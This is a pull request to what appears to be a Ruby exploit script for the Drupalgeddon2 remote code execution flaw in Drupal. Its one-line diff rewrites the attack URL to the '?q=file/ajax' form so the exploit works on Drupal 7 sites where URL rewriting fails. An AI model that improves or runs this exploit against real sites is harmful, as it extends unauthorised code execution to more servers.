### PR TITLE
Fix 404 Error In Some Drupal v7 Installs

### DIFF
--- a/drupalgeddon2.rb
+++ b/drupalgeddon2.rb
@@ -77,7 +77,7 @@ def gen_evil_url(evil)
     form_build_id = response.body.match(/input type="hidden" name="form_build_id" value="(.*)"/).to_s().slice(/value="(.*)"/, 1).to_s.strip
     puts "[!] WARNING: Didn't detect form_build_id" if form_build_id.empty?
 
-    url = $target + "file/ajax/name/%23value/" + form_build_id
+    url = $target + "?q=file/ajax/name/%23value/" + form_build_id
     payload = "form_build_id=" + form_build_id
   end
 


### PR DESCRIPTION
Some Drupal 7 installs do not properly handle the rewrite of /file/ajax.. to index.php?q=file/ajax.. This is resolved by calling index.php direct.